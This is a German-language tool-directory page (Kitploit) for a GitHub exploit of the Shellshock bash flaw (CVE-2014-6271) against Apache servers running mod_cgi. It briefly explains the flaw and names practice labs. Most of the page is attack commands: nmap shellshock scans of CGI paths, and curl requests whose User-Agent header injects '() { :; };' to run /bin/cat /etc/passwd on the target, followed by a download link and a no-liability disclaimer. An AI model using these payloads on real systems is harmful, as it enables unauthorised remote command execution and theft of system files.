Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271 — Ausnutzung der "Shellshock"-Sicherheitslücke. Remote Code Execution in Apache mit mod_cgi | Kitploit
Tools/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

Ausnutzung der "Shellshock"-Sicherheitslücke. Remote Code Execution in Apache mit mod_cgi

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Shellshock-Ausnutzung (CVE-2014-6271)

Shellshock ist im Wesentlichen eine Remote-Command-Execution-Schwachstelle in BASH. Dieses Skript nutzt die Schwachstelle in der Web-Umgebung auf Apache oder ähnlichen Servern mit aktiviertem mod_cgi. Die Schwachstelle liegt in der Manipulation von Umgebungsvariablen, bei denen es sich um dynamische, benannte Werte handelt, die beeinflussen, wie Prozesse auf einem Computer ablaufen. Angreifer können dies ausnutzen, indem sie schädlichen Code an Umgebungsvariablen anhängen, der beim Empfang der Variable ausgeführt wird. Dadurch können Angreifer das System möglicherweise kompromittieren.

Labor für Schwachstellentests

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

CGI-BIN-Seiten finden:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Manueller Test:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

Warnung:

Ich bin nicht verantwortlich für illegale Nutzung oder Schäden, die durch dieses Tool verursacht werden. Es wurde zum Spaß geschrieben, nicht für böse Zwecke, und soll das Bewusstsein für Hacking und Cybersicherheit schärfen.

*Gutes Hacken :) *

Tool herunterladen